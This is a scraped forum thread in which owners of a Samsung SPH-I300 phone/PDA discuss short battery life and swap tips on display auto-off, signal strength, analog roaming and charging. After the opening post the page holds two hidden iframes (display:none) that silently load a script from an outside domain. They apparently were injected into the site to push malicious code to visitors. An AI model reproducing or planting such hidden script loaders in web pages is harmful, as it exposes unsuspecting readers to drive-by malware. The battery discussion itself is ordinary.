+ Reply to Thread

Standard batteries run out quick...problem?

Just got my I300 2 days ago after reading all the encouraging words on this forum. Thanks for pushing me towards this great phone/pda! I feel more productive already....But...

Each of my standard batteries seems to last about 13-14 hours. I seem to speak about 90 minutes tops on the phone, and use the PDA on and off for a total of maybe 60 minutes.

Is this normal? I know that most manufacturers' battery claims are way off, but my batteries are a VERY FAR cry from Samsungs' 4.5 hour talk time estimates!

I'm wondering if I somehow didn't charge the batteries properly when I unpacked the phone. The manual said the phone needed 2 hours of charging per battery, and so I gave the first one 4 hours, adn the second one 10 hours, with a short power interruption after about 1 hour (had to much my charger to another room).

Any insights appreciated. Is this normal or no?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Battery usage has been my big pet peeve w/the phone. However, you numbers sound way low. Are you in a digital area, or going to analog. Those times sound like analog to me. With the standard battery I was getting about 36-40 hours per battery, with a combined useage of cell/pda. I could routinely talk for hours on a battery. I now have 2 extended batteries. I just got them, so I have not done a complete analysis, but my first battery lasted about 3 days. So I am please w/the extended batteries. I have my i300 set to shut the screen off after 30 seconds. Are you leaving your screen on? Also, I just leave my batteries in the charger until I need them, so sometimes they are in there for 24-48 hours. I know the charger stops charging when the battery is charged, but it seems to put a better charge on the battery. I have also noticed that charging the battery in the phone (wither with the cradel, travel charger or car charger), never charges the battery as good as charging the battery alone in the cradle.
    Carl

Administrator

Arrow

i hope he is not on analog... his bill will be huge!!!!

you cold be in a fringe area and causing your phoe to send more power to stay conected to the tower in your phones site. make a note of the areas you use your phone in (calls) and see what the signal is...

batteires need to "burn in" a bit.. so give them a little time to go thru the "break in" point.. like carl said, keep them in the charger until you need them.. that will keep them charged to the peak.. also rotate them every few days to "excercise" the cells..

you should see a increase in battery usage.. just give it some time...

If you are in a poor reception area or on analog roam, your battery life will be less than the stated spec.

The other major factor with the SPH-I300 are the display settings, the color screen draws a lot a juice....

To minimize the display's power consumption, first, from the phone application, go to the drop down menu and then Options - Preferences - Setup, and make sure that "Enable Auto-off of Display During Call" is checked.

This automatically turns the display off during calls per the setting in the Palm OS's Prefs - General - "Auto-off after". Setting this to 30 seconds will maximize battery life; you can always turn the display back on during the call by pressing the display on/off button on the right side of the handset, or one of the program buttons (DateBook, Address, etc.)

If you're in weak coverage, and leave the display constantly on while on voice calls you may well experience talk times of 90-120 minutes and might want to consider getting the extended battery.

I don't feel the 4,5 hour talk time quote is far off at all. That number is obviously derived from Samsung computing the time it takes for your batteries to COMPLETELY expire using ONLY your phone. Nothing else. We are all used to campanies embellishing in their products quality. People seem to understand this a lot more when talking about their cordless phones, which have absurd 2 week stand by times, than their mobiles.

I am using the display off during call feature and have 2 extended batteries, and am quite happy with the battery life now. I get between 2-3 days, and am a faily heavy user. Do any of you guys know if it is possible to have the phone display always on or always on when using external power (ie cradle or car charger). I would like to have the phone display on all the time when I have the i300 plugged into the car charger and the phone is hanging from my rear view mirror. Any ideas.... any hacks?
    Carl

Unless there are any hacks the answer is unfortunately no. I would like to keep my display running when in the cradle on my desktop.

Administrator

Arrow

i would worry about image burn in and the possibility of shortening the screens life by having it on all the time....

perhaps samsung kept that option out for a reason??